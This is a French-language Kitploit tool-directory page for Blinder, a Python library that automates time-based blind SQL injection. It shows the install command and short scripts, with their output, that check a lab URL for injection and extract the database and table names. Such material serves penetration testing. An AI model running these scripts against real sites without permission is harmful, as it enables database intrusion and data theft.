Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blinder — Une bibliothèque Python pour automatiser l'injection SQL aveugle basée sur le temps. | Kitploit
Outils/GitHubGitHub/mhaskar/blinder
Analyse des VulnérabilitésSécurité WebTests d'IntrusionSécurité des Bases de Données
GitHubmhaskar/blinder

Blinder

Une bibliothèque Python pour automatiser l'injection SQL aveugle basée sur le temps.

Voir le dépôt
5015il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Blinder

Blinder est une petite bibliothèque Python permettant d'automatiser les injections SQL aveugles basées sur le temps en utilisant des requêtes prédéfinies sous forme de fonctions pour accélérer le développement d'une preuve de concept (PoC).

Installation

Vous pouvez installer Blinder avec la commande suivante :

pip install blinder

Ou en téléchargeant les sources et en l'important manuellement dans votre projet.

Utilisation

Pour utiliser Blinder, vous devez importer le module Blinder, puis commencer à utiliser les fonctions principales de Blinder.

Vous pouvez utiliser Blinder (dans sa version actuelle) pour effectuer les actions suivantes :

  • Vérifier la présence d'une injection basée sur le temps.
  • Obtenir le nom de la base de données.
  • Obtenir les noms des tables.

Vous pouvez vérifier la présence d'une injection dans une URL avec le code suivant :

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

Le résultat de l'exécution sera :

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Vous pouvez obtenir le nom de la base de données avec le code suivant :

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Le nom de la base de données est : %s " % blind.get_database()

Et les résultats seront :

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Le nom de la base de données est : db1
root@kali:~/Desktop#

Pour obtenir les noms des tables, vous pouvez utiliser le code suivant :

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

Et les résultats seront :

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

De nombreuses fonctionnalités devraient être ajoutées prochainement, comme :

  • la possibilité d'ajouter une requête personnalisée
  • tester les points d'injection basés sur une requête Burp
  • extraire les données des tables/colonnes
Télécharger l’outil